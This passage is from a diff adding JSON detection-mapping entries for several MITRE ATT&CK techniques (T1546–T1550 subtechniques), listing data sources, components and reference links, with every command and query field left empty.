used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key access", + "description": "A registry key was accessed.", + "source_data_element": "user", + "relationship": "requested access to", + "target_data_element": "windows registry key" + } + ], + "external_reference": [ + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/security-principals" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry" + ] + ] + }, + { + "technique_id": "T1550.004", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "web credential", + "definition": "Data describing activity around web authentication credentials such as tokens and cookies", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "web credential usage", + "description": "A web credential was used.", + "source_data_element": "user", + "relationship": "attempted to use", + "target_data_element": "web credential" + }, + { + "data_source": "application log", + "definition": "Logs from events in third-party applications (mail server, web applications, etc.).", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + 
"Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Google Workspace" + ], + "data_component": "application log content", + "description": "Data captured in an application log.", + "source_data_element": "application log", + "relationship": "contained", + "target_data_element": "application event entries" + } + ], + "external_reference": [ + [ + "https://medium.com/@sherryhsu/session-vs-token-based-authentication-11a6c5ac45e4", + "https://auth0.com/docs/tokens/access-tokens" + ], + [ + "https://confluence.atlassian.com/doc/working-with-confluence-logs-108364721.html" + ] + ] + }, + { + "technique_id": "T1550.001", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "web credential", + "definition": "Data describing activity around web authentication credentials such as tokens and cookies", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "web credential usage", + "description": "A web credential was used.", + "source_data_element": "user", + "relationship": "attempted to use", + "target_data_element": "web credential" + }, + { + "data_source": "application log", + "definition": "Logs from events in third-party applications (mail server, web applications, etc.).", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Google Workspace" + ], + "data_component": "application log content", + "description": "Data captured in an application log.", + "source_data_element": "application log", + "relationship": "contained", + "target_data_element": "application event entries" + } + ], + "external_reference": [ + [ + "https://medium.com/@sherryhsu/session-vs-token-based-authentication-11a6c5ac45e4", + "https://auth0.com/docs/tokens/access-tokens" + 
], + [ + "https://confluence.atlassian.com/doc/working-with-confluence-logs-108364721.html" + ] + ] + }, + { + "technique_id": "T1550", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "logon session" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created logon session from", + "target_data_element": "ip" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + 
"macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created logon session from", + "target_data_element": "port" + }, + { + "data_source": "web credential", + "definition": "Data describing activity around web authentication credentials such as tokens and cookies", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "web credential usage", + "description": "A web credential was used.", + "source_data_element": "user", + "relationship": "attempted to use", + "target_data_element": "web credential" + }, + { + "data_source": "application log", + "definition": "Logs from events in third-party applications (mail server, web applications, etc.).", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Google Workspace" + ], + "data_component": "application log content", + "description": "Data captured in an application log.", + "source_data_element": "application log", + "relationship": "contained", + "target_data_element": "application event entries" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. 
It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate to", + "target_data_element": "computer" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate to", + "target_data_element": "application" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. 
It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate to", + "target_data_element": "cloud service" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate from", + "target_data_element": "ip" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. 
It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate from", + "target_data_element": "port" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "application", + "relationship": "attempted to authenticate", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. 
It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "cloud service", + "relationship": "attempted to authenticate", + "target_data_element": "user" + }, + { + "data_source": "active directory", + "definition": "Information associated with the Active Directory service or objects (Such as a user, a group, or a workstation) and activity around them.", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Azure AD" + ], + "data_component": "active directory credential request", + "description": "A user requested active directory credentials, such as a ticket or token.", + "source_data_element": "user", + "relationship": "requested", + "target_data_element": "ad credential" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/basic-audit-logon-events" + ], + [ + "https://medium.com/@sherryhsu/session-vs-token-based-authentication-11a6c5ac45e4", + "https://auth0.com/docs/tokens/access-tokens" + ], + [ + "https://confluence.atlassian.com/doc/working-with-confluence-logs-108364721.html" + ], + [ + "https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/security-principals" + ], + [ + "https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/ad-ds-getting-started" + ] + ] + }, + { + "technique_id": "T1548.004", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being 
executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "api call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "system call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process 
creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ] + ] + }, + { + "technique_id": "T1548", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process metadata", + "description": "Data and information that describe a process (Such as environment variables) and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + 
"collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": 
"user", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file stream" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "process", + "relationship": "retrieved information about", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "api call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "system call" + } + ], + 
"external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1547.008", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "module", + "definition": "Information about module files consisting of one or more classes and interfaces, such as portable executable (PE) format executables/dynamic link libraries (DLL), executable and linkable format (ELF) executables/shared libraries, and Mach-O format executables/shared libraries.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "module load", + "description": "A module was loaded into a process.", + "source_data_element": "process", + "relationship": "loaded", + "target_data_element": "module" + }, + { + "data_source": "driver", + "definition": "Information associated with device drivers, or computer programs that operate or control a particular type of device that is attached to a computer.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Linux", + "macOS", + "Windows" + ], + "data_component": "driver load", + "description": "A driver (User-mode, kernel-mode) was loaded.", + "source_data_element": "process", + "relationship": "loaded", + "target_data_element": "driver" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent 
computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibrarya", + "https://docs.microsoft.com/en-us/dotnet/api/system.reflection.module?view=netcore-3.1", + "https://docs.microsoft.com/en-us/windows/win32/debug/pe-format", + "https://elinux.org/Executable_and_Linkable_Format_(ELF)" + ], + [ + "https://developer.apple.com/library/archive/documentation/DeviceDrivers/Conceptual/IOKitFundamentals/Features/Features.html", + "https://docs.microsoft.com/en-us/windows-hardware/drivers/gettingstarted/user-mode-and-kernel-mode" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1547.003", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data 
used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "module", + "definition": "Information about module files consisting of one or more classes and interfaces, such as portable executable (PE) format executables/dynamic link libraries (DLL), executable and linkable format (ELF) executables/shared libraries, and Mach-O format executables/shared libraries.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "module load", + "description": "A module was loaded into a process.", + "source_data_element": "process", + "relationship": "loaded", + "target_data_element": "module" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a 
command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer 
programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibrarya", + "https://docs.microsoft.com/en-us/dotnet/api/system.reflection.module?view=netcore-3.1", + "https://docs.microsoft.com/en-us/windows/win32/debug/pe-format", + "https://elinux.org/Executable_and_Linkable_Format_(ELF)" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ] + ] + }, + { + "technique_id": "T1546.009", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", 
+ "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ 
+ "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "module", + "definition": "Information about module files consisting of one or more classes and interfaces, such as portable executable (PE) format executables/dynamic link libraries (DLL), executable and linkable format (ELF) executables/shared libraries, and Mach-O format executables/shared libraries.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "module load", + "description": "A module was loaded into a process.", + "source_data_element": "process", + "relationship": 
"loaded", + "target_data_element": "module" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibrarya", + "https://docs.microsoft.com/en-us/dotnet/api/system.reflection.module?view=netcore-3.1", + "https://docs.microsoft.com/en-us/windows/win32/debug/pe-format", + "https://elinux.org/Executable_and_Linkable_Format_(ELF)" + ] + ] + }, + { + "technique_id": "T1546.006", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + 
